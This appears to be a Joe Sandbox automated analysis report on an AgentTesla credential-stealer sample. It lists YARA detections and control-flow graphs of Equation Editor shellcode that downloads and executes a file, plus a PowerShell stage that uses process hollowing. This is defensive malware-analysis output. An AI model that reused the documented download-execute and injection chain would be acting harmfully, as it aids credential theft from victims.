                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.627094210.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.627094210.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.628206109.0000000002195000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:moderate
                                                            Has exited:false

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:34.5%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:64.4%
                                                              Total number of Nodes:73
                                                              Total number of Limit Nodes:6
                                                              execution_graph 275 3550707 GetPEB 276 3550715 275->276 327 3550557 ExitProcess 338 3550570 327->338 339 3550576 338->339 342 355057d 339->342 348 355058c 339->348 341 35505c5 342->341 343 35505ad 342->343 344 355061f 342->344 358 355061d 343->358 362 3550632 LoadLibraryW 344->362 349 3550592 348->349 374 35505b3 349->374 359 355061f 358->359 360 3550632 13 API calls 359->360 361 3550624 360->361 363 355064c 10 API calls 362->363 364 3550639 363->364 365 355065d 364->365 366 35506ad 8 API calls 364->366 367 35506db 3 API calls 365->367 366->365 368 35506cd 367->368 369 35506d5 ShellExecuteW 368->369 371 3550624 368->371 370 3550700 ExitProcess 369->370 372 35506f4 370->372 372->371 373 3550703 ExitProcess 372->373 375 35505b6 374->375 376 355061d 13 API calls 375->376 377 35505c5 376->377 277 3550632 LoadLibraryW 289 355064c 277->289 280 355065d 300 35506db 280->300 284 35506d5 ShellExecuteW 306 3550700 284->306 286 355073a 287 35506f4 287->286 288 3550703 ExitProcess 287->288 290 355064f 289->290 291 35506ad 8 API calls 290->291 292 355065d 290->292 291->292 293 35506db 3 API calls 292->293 294 35506cd 293->294 295 35506d5 ShellExecuteW 294->295 297 3550639 294->297 296 3550700 ExitProcess 295->296 298 35506f4 296->298 297->280 308 35506ad URLDownloadToFileW 297->308 298->297 299 3550703 ExitProcess 298->299 301 35506de ShellExecuteW 300->301 302 3550700 ExitProcess 301->302 303 35506f4 301->303 302->303 304 35506cd 303->304 305 3550703 ExitProcess 303->305 304->284 304->286 307 3550703 ExitProcess 306->307 318 35506c6 308->318 311 35506db 3 API calls 312 35506cd 311->312 313 35506d5 ShellExecuteW 312->313 314 355073a 312->314 315 3550700 ExitProcess 313->315 314->280 316 35506f4 315->316 316->314 317 3550703 ExitProcess 316->317 319 35506c8 318->319 320 35506cd 319->320 321 35506db 3 API calls 319->321 322 35506d5 ShellExecuteW 320->322 324 35506b6 320->324 321->320 323 3550700 ExitProcess 322->323 325 35506f4 323->325 324->311 325->324 326 3550703 ExitProcess 325->326

                                                              Callgraph

                                                              • Executed
                                                              • Not Executed
                                                              • Opacity -> Relevance
                                                              • Disassembly available
                                                              callgraph 0 Function_03550557 1 Function_03550570 0->1 3 Function_03550632 0->3 6 Function_0355061D 0->6 17 Function_0355058C 0->17 1->3 1->6 14 Function_03550780 1->14 1->17 2 Function_035505B3 2->6 8 Function_035506DB 3->8 13 Function_03550700 3->13 15 Function_035506AD 3->15 16 Function_0355064C 3->16 4 Function_03550252 5 Function_03550232 6->3 7 Function_03550218 8->13 9 Function_035500FB 10 Function_03550707 18 Function_0355072F 10->18 11 Function_035502C7 12 Function_035506C6 12->8 12->13 15->8 15->12 15->13 16->8 16->13 16->15 17->2 17->3 17->6 17->14 19 Function_03550029

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 3550632-355063e LoadLibraryW call 355064c 3 3550640-35506ab call 35506ad 0->3 4 35506ae-35506d3 call 35506db 0->4 3->4 12 35506d5-35506f5 ShellExecuteW call 3550700 4->12 13 355073a-3550746 4->13 24 35506f7 12->24 25 3550760-3550764 12->25 14 3550749 13->14 18 3550751-3550755 14->18 19 355074b-355074f 14->19 22 3550757-355075b 18->22 23 355076a-355076c 18->23 19->18 21 355075d 19->21 21->25 22->21 22->23 26 355077c-355077d 23->26 24->14 27 35506f9 24->27 28 3550766 25->28 29 3550768 25->29 27->23 31 35506fb-3550705 ExitProcess 27->31 28->23 29->23 30 355076e-3550777 29->30 34 3550740-3550743 30->34 35 3550779 30->35 34->30 37 3550745 34->37 35->26 37->14
                                                              APIs
                                                              • LoadLibraryW.KERNEL32(03550624), ref: 03550632
                                                              • ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 035506ED
                                                              • ExitProcess.KERNEL32(00000000), ref: 03550705
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.470930228.0000000003550000.00000004.00000020.00020000.00000000.sdmp, Offset: 03550000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_3550000_EQNEDT32.jbxd
                                                              Similarity
                                                              • API ID: ExecuteExitLibraryLoadProcessShell
                                                              • String ID:
                                                              • API String ID: 2383344257-0
                                                              • Opcode ID: 5d5fccddb90595bfdf2582b2f045291fd72df6074994b46e2b5119b2564bf2a6
                                                              • Instruction ID: 169465dad8b9dad033eea1a736a8ac1db8b2ecbdf35f85664476cb6f76835b74
                                                              • Opcode Fuzzy Hash: 5d5fccddb90595bfdf2582b2f045291fd72df6074994b46e2b5119b2564bf2a6
                                                              • Instruction Fuzzy Hash: 11314FA280E3C16FDB13D7341D7A7557F646B53204F6D49CFE8C20A4E3E6886405C796

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 38 35506ad-35506d3 URLDownloadToFileW call 35506c6 call 35506db 44 35506d5-35506f5 ShellExecuteW call 3550700 38->44 45 355073a-3550746 38->45 54 35506f7 44->54 55 3550760-3550764 44->55 46 3550749 45->46 48 3550751-3550755 46->48 49 355074b-355074f 46->49 52 3550757-355075b 48->52 53 355076a-355076c 48->53 49->48 51 355075d 49->51 51->55 52->51 52->53 56 355077c-355077d 53->56 54->46 57 35506f9 54->57 58 3550766 55->58 59 3550768 55->59 57->53 61 35506fb-3550705 ExitProcess 57->61 58->53 59->53 60 355076e-3550777 59->60 64 3550740-3550743 60->64 65 3550779 60->65 64->60 67 3550745 64->67 65->56 67->46
                                                              APIs
                                                              • URLDownloadToFileW.URLMON(00000000,0355065D,?,00000000,00000000), ref: 035506AF
                                                                • Part of subcall function 035506C6: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 035506ED
                                                                • Part of subcall function 035506C6: ExitProcess.KERNEL32(00000000), ref: 03550705
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.470930228.0000000003550000.00000004.00000020.00020000.00000000.sdmp, Offset: 03550000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_3550000_EQNEDT32.jbxd
                                                              Similarity
                                                              • API ID: DownloadExecuteExitFileProcessShell
                                                              • String ID:
                                                              • API String ID: 3584569557-0
                                                              • Opcode ID: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
                                                              • Instruction ID: cc0cdaa3ec0c4e4496e16d2ec79ceb2f321dba401bfc9670d7a6ee0606b016b6
                                                              • Opcode Fuzzy Hash: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
                                                              • Instruction Fuzzy Hash: 08F0E26155D34179E611E7742CBAF5A6E24BFC1700F14088BF9424F0F2E484B800CA59

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 68 35506db-35506ed ShellExecuteW 70 35506f4-35506f5 68->70 71 35506ef call 3550700 68->71 72 35506f7 70->72 73 3550760-3550764 70->73 71->70 74 3550749 72->74 75 35506f9 72->75 76 3550766 73->76 77 3550768 73->77 80 3550751-3550755 74->80 81 355074b-355074f 74->81 79 355076a-355076c 75->79 82 35506fb-3550705 ExitProcess 75->82 76->79 78 355076e-3550777 77->78 77->79 88 3550740-3550743 78->88 89 3550779 78->89 83 355077c-355077d 79->83 80->79 86 3550757-355075b 80->86 81->80 85 355075d 81->85 85->73 86->79 86->85 88->78 91 3550745 88->91 89->83 91->74
                                                              APIs
                                                              • ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 035506ED
                                                                • Part of subcall function 03550700: ExitProcess.KERNEL32(00000000), ref: 03550705
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.470930228.0000000003550000.00000004.00000020.00020000.00000000.sdmp, Offset: 03550000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_3550000_EQNEDT32.jbxd
                                                              Similarity
                                                              • API ID: ExecuteExitProcessShell
                                                              • String ID:
                                                              • API String ID: 1124553745-0
                                                              • Opcode ID: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
                                                              • Instruction ID: ac5b1d00db797564715a78661be9d37d6a3639fc804c3a27e05de3212e8ee4a4
                                                              • Opcode Fuzzy Hash: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
                                                              • Instruction Fuzzy Hash: F401266497430231DB30E6386C75BFAAA51BB41B10F9C4D47BD820B0F5D098F4C38E59

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 92 35506c6-35506c8 94 35506cd-35506d3 92->94 95 35506c8 call 35506db 92->95 96 35506d5-35506f5 ShellExecuteW call 3550700 94->96 97 355073a-3550746 94->97 95->94 106 35506f7 96->106 107 3550760-3550764 96->107 98 3550749 97->98 100 3550751-3550755 98->100 101 355074b-355074f 98->101 104 3550757-355075b 100->104 105 355076a-355076c 100->105 101->100 103 355075d 101->103 103->107 104->103 104->105 108 355077c-355077d 105->108 106->98 109 35506f9 106->109 110 3550766 107->110 111 3550768 107->111 109->105 113 35506fb-3550705 ExitProcess 109->113 110->105 111->105 112 355076e-3550777 111->112 116 3550740-3550743 112->116 117 3550779 112->117 116->112 119 3550745 116->119 117->108 119->98
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.470930228.0000000003550000.00000004.00000020.00020000.00000000.sdmp, Offset: 03550000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_3550000_EQNEDT32.jbxd
                                                              Similarity
                                                              • API ID: ExecuteExitProcessShell
                                                              • String ID:
                                                              • API String ID: 1124553745-0
                                                              • Opcode ID: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
                                                              • Instruction ID: 9c49ef14ef7762fed97a4816a383080ccefb380397ff74c8cef89972f7d305f9
                                                              • Opcode Fuzzy Hash: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
                                                              • Instruction Fuzzy Hash: 9B01492057830271E760E2342CB5BEEAA80BB81B14FA8485BFC420B0F1D284F843CE5D

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 120 3550700-3550705 ExitProcess
                                                              APIs
                                                              • ExitProcess.KERNEL32(00000000), ref: 03550705
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.470930228.0000000003550000.00000004.00000020.00020000.00000000.sdmp, Offset: 03550000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_3550000_EQNEDT32.jbxd
                                                              Similarity
                                                              • API ID: ExitProcess
                                                              • String ID:
                                                              • API String ID: 621844428-0
                                                              • Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                              • Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
                                                              • Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                              • Instruction Fuzzy Hash:

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 122 3550707-3550712 GetPEB 123 3550715-3550726 call 355072f 122->123 126 3550728-355072c 123->126
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.470930228.0000000003550000.00000004.00000020.00020000.00000000.sdmp, Offset: 03550000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_3550000_EQNEDT32.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                                              • Instruction ID: f0b23ab589720a30d8f819a2cfbd8a043707d3a1cb0fc3ad32a332d5d00d9491
                                                              • Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                                              • Instruction Fuzzy Hash: CCD05235222503CFC308DF04D990E13F37AFFC8310B28C269E8044B6A9E730E892CA90

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 127 3550557-355057e ExitProcess call 3550570 call 355058c 132 35505d1-35505ed 127->132 133 3550581-3550586 127->133 134 35505ef-3550608 132->134 137 35505ee 133->137 138 3550589-355059a 133->138 136 355060c-355061b 134->136 137->134 138->136 141 355059c-35505a1 138->141 141->136 142 35505a3-35505ab 141->142 145 35505ad-35505ce call 355061d 142->145 146 355061f-3550630 call 3550632 142->146 145->132
                                                              APIs
                                                              • ExitProcess.KERNEL32(03550545), ref: 03550557
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.470930228.0000000003550000.00000004.00000020.00020000.00000000.sdmp, Offset: 03550000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_3550000_EQNEDT32.jbxd
                                                              Similarity
                                                              • API ID: ExitProcess
                                                              • String ID:
                                                              • API String ID: 621844428-0
                                                              • Opcode ID: d300ee01c16c3660181be114d049e5a915fdbe1aa05a8ab2d8c2e0d0d27b0d18
                                                              • Instruction ID: d73e3a9542c8ff7e14dd26042aad2f101bc273917011b500e2179157c0aa7d42
                                                              • Opcode Fuzzy Hash: d300ee01c16c3660181be114d049e5a915fdbe1aa05a8ab2d8c2e0d0d27b0d18
                                                              • Instruction Fuzzy Hash: 8F21BDA684E7C50FC712DB70AA7A465BF613D6320431D86CFD8C20F0F3EA58A106D792

                                                              Execution Graph

                                                              Execution Coverage:4.9%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:22
                                                              Total number of Limit Nodes:3
                                                              execution_graph 6660 277237 6661 277221 6660->6661 6663 2772db 6661->6663 6665 277346 6661->6665 6666 27735f 6665->6666 6667 277333 6666->6667 6669 2773d0 6666->6669 6670 27744d 6669->6670 6676 2779c8 6670->6676 6683 2763c0 6670->6683 6672 2774d8 6673 2763cc Wow64SetThreadContext 6672->6673 6672->6676 6674 277543 6673->6674 6675 277656 VirtualAllocEx 6674->6675 6674->6676 6677 2776a3 6675->6677 6676->6666 6677->6676 6678 2776f1 VirtualAllocEx 6677->6678 6679 277745 6677->6679 6678->6679 6679->6676 6680 2763f0 Wow64SetThreadContext 6679->6680 6681 277977 6680->6681 6681->6676 6682 277988 ResumeThread 6681->6682 6682->6676 6684 277bd0 CreateProcessW 6683->6684 6686 277d29 6684->6686

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 2773d0-277481 4 277487-277497 0->4 5 277bb9-277bc3 0->5 8 2774a0 4->8 9 277499-27749e 4->9 10 2774a2-2774a4 8->10 9->10 11 2774a6-2774b9 10->11 12 2774bb-2774da call 2763c0 10->12 11->12 16 2774e3 12->16 17 2774dc-2774e1 12->17 18 2774e5-2774e7 16->18 17->18 19 277b2f-277b42 18->19 20 2774ed-277502 18->20 27 277b49-277b5f 19->27 23 277b2a 20->23 24 277508-27752c 20->24 23->19 24->27 30 277532-277545 call 2763cc 24->30 27->5 34 277b61-277b6b 27->34 35 277acd-277acf 30->35 36 27754b-277552 30->36 43 277b76-277b78 34->43 44 277b6d-277b74 34->44 37 277ab3-277ac6 36->37 38 277558-277562 36->38 37->35 38->27 39 277568-277585 38->39 39->23 42 27758b-2775a5 call 2763d8 39->42 52 277ad4 42->52 53 2775ab-2775b2 42->53 46 277b7a-277b7e 43->46 44->46 49 277b85-277b92 46->49 50 277b80 call 276774 46->50 63 277b99-277bb6 49->63 50->49 59 277adb 52->59 55 277a99-277aac 53->55 56 2775b8-2775c1 53->56 55->37 57 2775c3-277607 56->57 58 27762c-277632 56->58 67 277610-27761c 57->67 68 277609-27760f 57->68 58->23 62 277638-277648 58->62 65 277ae5 59->65 62->23 70 27764e-2776a1 VirtualAllocEx 62->70 71 277aec 65->71 67->59 72 277622-277626 67->72 68->67 77 2776a3-2776a9 70->77 78 2776aa-2776c8 70->78 76 277af3 71->76 72->58 74 277a7f-277a92 72->74 74->55 80 277afa 76->80 77->78 78->65 81 2776ce-2776d5 78->81 86 277b01 80->86 84 27775c-277763 81->84 85 2776db-2776e2 81->85 84->76 87 277769-277770 84->87 85->71 88 2776e8-2776ef 85->88 92 277b0b 86->92 89 277776-277791 call 2763e4 87->89 90 277a65-277a78 87->90 88->84 91 2776f1-277743 VirtualAllocEx 88->91 89->80 99 277797-27779e 89->99 90->74 94 277745-27774b 91->94 95 27774c-277756 91->95 98 277b12 92->98 94->95 95->84 104 277b19 98->104 102 2777a4-2777ad 99->102 103 277a4b-277a5e 99->103 102->23 105 2777b3-2777b9 102->105 103->90 108 277b23 104->108 105->23 106 2777bf-2777ca 105->106 106->23 111 2777d0-2777d6 106->111 108->23 112 2777dc-2777e1 111->112 113 2778d9-2778ea 111->113 112->23 114 2777e7-2777fa 112->114 113->23 117 2778f0-277904 call 2763e4 113->117 114->23 118 277800-277813 114->118 117->98 122 27790a-277911 117->122 118->23 123 277819-27782e 118->123 124 277a17-277a2a 122->124 125 277917-27791d 122->125 123->86 130 277834-277838 123->130 139 277a31-277a44 124->139 125->23 126 277923-277934 125->126 126->104 131 27793a-27793e 126->131 132 2778bf-2778c2 130->132 133 27783e-277847 130->133 135 277940-277943 131->135 136 277949-277951 131->136 132->23 137 2778c8-2778cb 132->137 133->23 138 27784d-277850 133->138 135->136 136->23 140 277957-277961 136->140 137->23 141 2778d1-2778d3 137->141 138->23 142 277856-277886 138->142 139->103 140->27 143 277967-277979 call 2763f0 140->143 141->112 141->113 142->23 153 27788c-2778a5 call 2763e4 142->153 143->108 149 27797f-277986 143->149 151 2779e3-2779f6 149->151 152 277988-2779c6 ResumeThread 149->152 160 2779fd-277a10 151->160 155 2779cf-2779dc 152->155 156 2779c8-2779ce 152->156 158 2778aa-2778ac 153->158 159 2779de-277b94 155->159 155->160 156->155 158->92 161 2778b2-2778b9 158->161 159->63 160->124 161->132 161->139
                                                              APIs
                                                              • VirtualAllocEx.KERNEL32(?,?,00000000,00003000,00000040), ref: 0027768A
                                                              • VirtualAllocEx.KERNEL32(?,00000000,00000000,00003000,00000040), ref: 0027772C
                                                              • ResumeThread.KERNELBASE(?), ref: 002779AF
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.515993263.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_270000_powershell.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual$ResumeThread
                                                              • String ID:
                                                              • API String ID: 3804112640-0
                                                              • Opcode ID: 6073895f9f897a7bd28e4964635d7dad7db8ccb7f60746df40d83e37029b61a6
                                                              • Instruction ID: bde7c7813aba7c7fb7f67388cde31fa5ffe479ba470e7564d03c25a51bd69051
                                                              • Opcode Fuzzy Hash: 6073895f9f897a7bd28e4964635d7dad7db8ccb7f60746df40d83e37029b61a6
                                                              • Instruction Fuzzy Hash: D9129070B242158FEB249F35C854B9EB7B2AF84344F24C1A9E40DAB391EB749E91CF51

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 349 8c2520-8c2542 350 8c26bf-8c270a 349->350 351 8c2548-8c254d 349->351 358 8c2865-8c28aa 350->358 359 8c2710-8c2715 350->359 352 8c254f-8c2555 351->352 353 8c2565-8c2571 351->353 354 8c2559-8c2563 352->354 355 8c2557 352->355 360 8c266a-8c2674 353->360 361 8c2577-8c257a 353->361 354->353 355->353 378 8c2a54-8c2a84 358->378 379 8c28b0-8c28b5 358->379 363 8c272d-8c2731 359->363 364 8c2717-8c271d 359->364 369 8c2676-8c267f 360->369 370 8c2682-8c2688 360->370 361->360 365 8c2580-8c2587 361->365 366 8c2737-8c273b 363->366 367 8c2810-8c281a 363->367 371 8c271f 364->371 372 8c2721-8c272b 364->372 365->350 375 8c258d-8c2592 365->375 376 8c273d-8c274e 366->376 377 8c277b 366->377 380 8c281c-8c2825 367->380 381 8c2828-8c282e 367->381 373 8c268e-8c269a 370->373 374 8c268a-8c268c 370->374 371->363 372->363 382 8c269c-8c26bc 373->382 374->382 384 8c25aa-8c25ae 375->384 385 8c2594-8c259a 375->385 376->358 414 8c2754-8c2759 376->414 390 8c277d-8c277f 377->390 411 8c2abd-8c2ac7 378->411 412 8c2a86-8c2aa3 378->412 386 8c28cd-8c28d1 379->386 387 8c28b7-8c28bd 379->387 388 8c2834-8c2840 381->388 389 8c2830-8c2832 381->389 384->360 398 8c25b4-8c25b8 384->398 395 8c259c 385->395 396 8c259e-8c25a8 385->396 391 8c29fc-8c2a06 386->391 392 8c28d7-8c28db 386->392 399 8c28bf 387->399 400 8c28c1-8c28cb 387->400 402 8c2842-8c2862 388->402 389->402 390->367 393 8c2785-8c2789 390->393 403 8c2a08-8c2a11 391->403 404 8c2a14-8c2a1a 391->404 405 8c28dd-8c28ee 392->405 406 8c291b 392->406 393->367 407 8c278f-8c279e 393->407 395->384 396->384 409 8c25d8 398->409 410 8c25ba-8c25d6 398->410 399->386 400->386 415 8c2a1c-8c2a1e 404->415 416 8c2a20-8c2a2c 404->416 405->378 438 8c28f4-8c28f9 405->438 418 8c291d-8c291f 406->418 439 8c27b6-8c280d 407->439 440 8c27a0-8c27a6 407->440 419 8c25da-8c25dc 409->419 410->419 421 8c2ac9-8c2acd 411->421 422 8c2ad0-8c2ad6 411->422 443 8c2b0d-8c2b12 412->443 444 8c2aa5-8c2ab7 412->444 423 8c275b-8c2761 414->423 424 8c2771-8c2779 414->424 428 8c2a2e-8c2a51 415->428 416->428 418->391 430 8c2925-8c2929 418->430 419->360 433 8c25e2-8c25ef 419->433 434 8c2adc-8c2ae8 422->434 435 8c2ad8-8c2ada 422->435 436 8c2765-8c276f 423->436 437 8c2763 423->437 424->390 430->391 442 8c292f-8c2933 430->442 464 8c25f6-8c25f8 433->464 446 8c2aea-8c2b0a 434->446 435->446 436->424 437->424 447 8c28fb-8c2901 438->447 448 8c2911-8c2919 438->448 449 8c27a8 440->449 450 8c27aa-8c27ac 440->450 442->391 453 8c2939-8c295f 442->453 443->444 444->411 459 8c2905-8c290f 447->459 460 8c2903 447->460 448->418 449->439 450->439 453->391 473 8c2965-8c2969 453->473 459->448 460->448 466 8c25fa-8c2600 464->466 467 8c2610-8c2667 464->467 470 8c2604-8c2606 466->470 471 8c2602 466->471 470->467 471->467 474 8c298c 473->474 475 8c296b-8c2974 473->475 478 8c298f-8c299c 474->478 476 8c297b-8c2988 475->476 477 8c2976-8c2979 475->477 479 8c298a 476->479 477->479 481 8c29a2-8c29f9 478->481 479->478
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.516335466.00000000008C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_8c0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: L8z$L8z
                                                              • API String ID: 0-3021198793
                                                              • Opcode ID: 9aa10b138a6a72ad207ee01860f98c74a9a0bc7a63366f27bcc6edf721ddb0dc
                                                              • Instruction ID: 876dd311272c6e0c0a80368a262acc8556cb45ea983bf67e381e50db326a95e2
                                                              • Opcode Fuzzy Hash: 9aa10b138a6a72ad207ee01860f98c74a9a0bc7a63366f27bcc6edf721ddb0dc
                                                              • Instruction Fuzzy Hash: D7E1BE31B04218DFDB259F65C850FAABBB2FB95310F24C46EE455CB291DB31C946CBA1

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 483 2763c0-277c49 485 277c51-277c58 483->485 486 277c4b-277c4e 483->486 487 277c63-277c79 485->487 488 277c5a-277c60 485->488 486->485 489 277c84-277d27 CreateProcessW 487->489 490 277c7b-277c81 487->490 488->487 492 277d30-277da8 489->492 493 277d29-277d2f 489->493 490->489 500 277dba-277dc1 492->500 501 277daa-277db0 492->501 493->492 502 277dc3-277dd2 500->502 503 277dd8 500->503 501->500 502->503 505 277dd9 503->505 505->505
                                                              APIs
                                                              • CreateProcessW.KERNEL32(00000000,?,00000009,?,?,?,?,?,7414FDA4,?), ref: 00277D14
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.515993263.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_270000_powershell.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: 805a714f1c4ea471cf55d88b839cdb5fdd9d526bebe184e4bc5683c70cf55e96
                                                              • Instruction ID: 32cdafa4bd9ab82971f381781fc3a611fd9567471d0a8a01441150c360f589b5
                                                              • Opcode Fuzzy Hash: 805a714f1c4ea471cf55d88b839cdb5fdd9d526bebe184e4bc5683c70cf55e96
                                                              • Instruction Fuzzy Hash: 12511771901219DFEF24CF99C984BEDBBB5BF48304F1084AAE909B7250D7759A98CF90

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 506 277bcb-277c49 507 277c51-277c58 506->507 508 277c4b-277c4e 506->508 509 277c63-277c79 507->509 510 277c5a-277c60 507->510 508->507 511 277c84-277d27 CreateProcessW 509->511 512 277c7b-277c81 509->512 510->509 514 277d30-277da8 511->514 515 277d29-277d2f 511->515 512->511 522 277dba-277dc1 514->522 523 277daa-277db0 514->523 515->514 524 277dc3-277dd2 522->524 525 277dd8 522->525 523->522 524->525 527 277dd9 525->527 527->527
                                                              APIs
                                                              • CreateProcessW.KERNEL32(00000000,?,00000009,?,?,?,?,?,7414FDA4,?), ref: 00277D14
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.515993263.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_270000_powershell.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: 70395383e3e5e6c5b177e2e75674de6f6b573e11fe32a4bd32d3be5bdcb903d3
                                                              • Instruction ID: bd78d2fc3535c44541d90f9c99aaceb279fecdd1001909231867caa030041ac0
                                                              • Opcode Fuzzy Hash: 70395383e3e5e6c5b177e2e75674de6f6b573e11fe32a4bd32d3be5bdcb903d3
                                                              • Instruction Fuzzy Hash: 8E5115B19012199FEF25CF99C984BEDBBB1AF48304F1084AAE909B7250D7759A98CF50

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 535 2763f0-277e50 537 277e52-277e5a 535->537 538 277e5c-277e88 Wow64SetThreadContext 535->538 537->538 539 277e91-277eb2 538->539 540 277e8a-277e90 538->540 540->539
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,00277543), ref: 00277E7B
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.515993263.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_270000_powershell.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: 5586577189e1f9f6f08022e5134238945894a3bede8ba4e1f2300f3b1f3bedeb
                                                              • Instruction ID: 5f5668e4a02a0c116be2331571736e82ce2218ff5b5207cd2d652ade320b7a08
                                                              • Opcode Fuzzy Hash: 5586577189e1f9f6f08022e5134238945894a3bede8ba4e1f2300f3b1f3bedeb
                                                              • Instruction Fuzzy Hash: 531137B1D1420A8FDB10CF9AC884BDEBBF4EB89310F15C469D468B3240D378A955CFA5

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 528 2763cc-277e50 530 277e52-277e5a 528->530 531 277e5c-277e88 Wow64SetThreadContext 528->531 530->531 532 277e91-277eb2 531->532 533 277e8a-277e90 531->533 533->532
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,00277543), ref: 00277E7B
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.515993263.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_270000_powershell.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: 7b55b2ffff89b8bd0a72bebb0009d855be59bbf09d67d5157d52cabadda9d64d
                                                              • Instruction ID: ca81c2f54506cf1c7bd35908ac30da497b38edc82d66fcad09914562c481b8e1
